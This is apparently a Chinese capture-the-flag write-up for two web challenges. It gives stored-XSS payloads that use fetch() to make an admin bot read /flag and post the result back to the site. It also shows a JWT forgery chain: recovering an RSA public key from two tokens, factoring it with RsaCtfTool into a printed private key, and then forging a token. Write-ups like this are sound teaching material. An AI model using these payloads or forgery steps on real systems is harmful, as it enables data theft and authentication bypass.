其实本来是不想写这篇文章的,因为一直没有环境复现,但想想还是记录一下网鼎的那道xss吧,因为国内ctf xss比较少,本人对xss的认知也比较一般。因为没有复现环境所以以下大多是口述,比赛的时候忘截图了…

web02

首先随便输入账号密码登陆,服务端会给出hash路径,到后台会发现其会将我们输入的只
直接发送到任务栏上,为存储型 xss 漏洞。经过尝试发现使用

1
><script>alert(1)</script>

就可以触发xss。

这时我就想着先外带,于是尝试了多个外带的payload结果一直都不行,这时我怀疑,bot是不是只能再本站访问。
于是我就写了如下payload来尝试让bot进行post请求将字符”aaa”写入道任务栏中

1
<script>fetch("http://0192d601faa97dffa2890e43bf77feeb.i5nk.dg04.ciihw.cn:46662/content/f4a62598d9e423749687a71a0adab246", {     method: "POST",     headers: {         "Content-Type": "application/x-www-form-urlencoded"     },     body: "content='aaaa'" }) .then(response => response.text()) .then(data => console.log(data));<script>

结果不行,这就给我整不会了,最后再经过多次尝试发现,bot不会访问带http的url。。。。于是修改以下payload
1
<script>fetch("/content/f4a62598d9e423749687a71a0adab246", {     method: "POST",     headers: {         "Content-Type": "application/x-www-form-urlencoded"     },     body: "content='aaaa'" }) .then(response => response.text()) .then(data => console.log(data));<script>

就发现其成功进行了访问并写入内容。而flag再flag路由下,我们只要让其访问/flag并将其回显写入道任务栏即可

1
><script>fetch('/flag').then(response => response.text()).then(data => { console.log("Flag Data:", data);fetch('/content/6dd78abd8072067672645b3429746fcd', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: "content=123" + data }).then(response => response.text()).then(result => { console.log("Response from /content/url:", result);  }); });</script>

web1

这题因为没有复现环境就简单复现以下jwt的环节吧,个人让我jwt算这题的难点了

首先python的jwt我们可以尝试使用这个工具来得到公钥rsa_sign2n

1
python jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbTFpbiJ9.FW-UjoD_ldtasCm1OJli6JhnTSicnnGDrkapCnJRkBcfo6rxnzu6sldJI321anP4BRHwJZJHWDW_q22KhAqS9HtS_tJGCJG_t5iX6UbED03yFLrZ_yBoYX0Va-ExC9PNF-2zohPjGP0u9wsF-27120zrpO_9PqkCFze_Xys-VflN eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEifQ.HDso3-3ZGjO8_J2ziO5Z2UasjqAl6v50-LrCIe-AmeHRrTWPaJco5Kai5u3eyM4kNInKSjn2fCDjhPvP3-QO2b69BpuNKE7uDRVzuuip6N3T-mnrKBbHrbOPWGFdNIOsPxKyhBn9OC4pOQB5mi5pBXVTh_JCuNXf7dm3_nEz-hY6


这个工具会把公钥生成在同目录文件夹下
1
2
3
4
5
6
7
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgSSlUMfCzg/ysG4ixoi6NKGuWNnv
IpZZTRNa045eH2xzzY/ZyRwDojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fAN
MNCYRa47xIW0RwZBDSABcGnwu3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502
ZMSv0AxMgN5UMh9FCwIDAQAB
-----END PUBLIC KEY-----


我们可以看到公钥是很短的,那直接可以进行拆分。因为我是web手除了在大一时在hgame是打了道RSA的题后面就几乎没有打过了,所以直接上脚本RsaCtfTool

还有因为这种环境安多了容易产生冲突所以这样可以使用虚拟环境

1
2
3
4
5
6
python -m venv xxxx
cd xxxx/Scripts
./activate

退出 
deactivate

然后使用使用工具来获得私钥
1
python RsaCtfTool.py --publickey ./public --private

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
MIICoQIBAAKBgSSlUMfCzg/ysG4ixoi6NKGuWNnvIpZZTRNa045eH2xzzY/ZyRwD
ojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fANMNCYRa47xIW0RwZBDSABcGnw
u3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502ZMSv0AxMgN5UMh9FCwIDAQAB
AoGBC5/r+nCv2+uWXTjL8i6UJtLIfdOssxKbJNiIKLXQh3l8IAAfx1i9ktxYEICW
TcGTUkx9gjd+xUwo0KOKjcg3hZc7bEfLkiOsK8dSwsPFEXYQpCE1EFokhkc9Rbiq
URC9QIrQjtzf5vdU2usj5ddRGtqtmpXm/ibU1TLPIsy8Y5TJAoGBAP2Mj8b+pnwu
SCp0EYh99ogr6jblQlVwySv34UDQarcFjkQoB60SOMZpGCyPr/auhfDIsNvKyXLK
S7IBEBFMETWywUx28OGFV7xtGF7RfLWmaKYXy4ML/DfHonV8khZ6h5wpyxPL3Wli
uJCSSsjNgXhj4aeGLtRRuySpiXflrdFvAgElAoGBALrhzOO+tJWZQ2XPMVEqjvjl
bXfS2WbCf/Theuzb8Zw/AxJncuj1IlXUBpZpvigTkPPd6MXIHV13j/1+3QnyyEiN
Hf6vOHLxZq6itrDEtafqJP4vUbigr+GpSqxQChl5bNUE1QMdY3AW7LTarzZ8iq5i
6GMi+wdRyp+GOqXd65UPAgERAoGAUjts5pfHSt6T8hfOVcf87eS6qgUqRTlWAGwR
tCfrQkb9tT1qRfgSadzlPuJ+QirDqAm80amNcVZdvTDG8NpmckfP/R+oEcphpOUc
qSFY4PezPMlyb7DcLcQ0sHttpmztthtkdR+GFFdedBPFOjTQC16qDNGSpbmkepfZ
jqta99E=

然后使用这个网站来伪造https://www.bejson.com/jwt/即可,jwt.io有点难用